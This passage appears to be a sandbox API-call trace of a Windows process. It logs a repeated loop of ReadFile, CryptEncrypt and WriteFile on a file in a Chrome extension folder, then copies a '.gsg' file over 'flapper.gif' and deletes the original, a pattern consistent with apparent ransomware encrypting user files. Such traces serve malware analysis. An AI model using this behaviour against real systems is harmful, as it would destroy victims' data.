lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.707] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.707] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.707] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.708] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.708] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.708] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.708] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.708] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.708] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.708] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.709] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.709] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.709] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.709] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.709] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.709] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.709] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.710] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.710] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.710] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.710] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.710] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.710] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.710] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.711] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.711] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.711] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.711] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.711] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.711] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.712] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.712] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.712] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.712] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.712] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.712] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.713] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x1dc, lpOverlapped=0x0) returned 1 [0258.713] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x1dc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x1e0) returned 1 [0258.713] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x1e0, lpOverlapped=0x0) returned 1 [0258.713] CloseHandle (hObject=0x5d50) returned 1 [0258.713] CloseHandle (hObject=0x5d60) returned 1 [0258.713] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), bFailIfExists=0) returned 1 [0258.717] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif", dwFileAttributes=0x0) returned 1 [0258.717] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 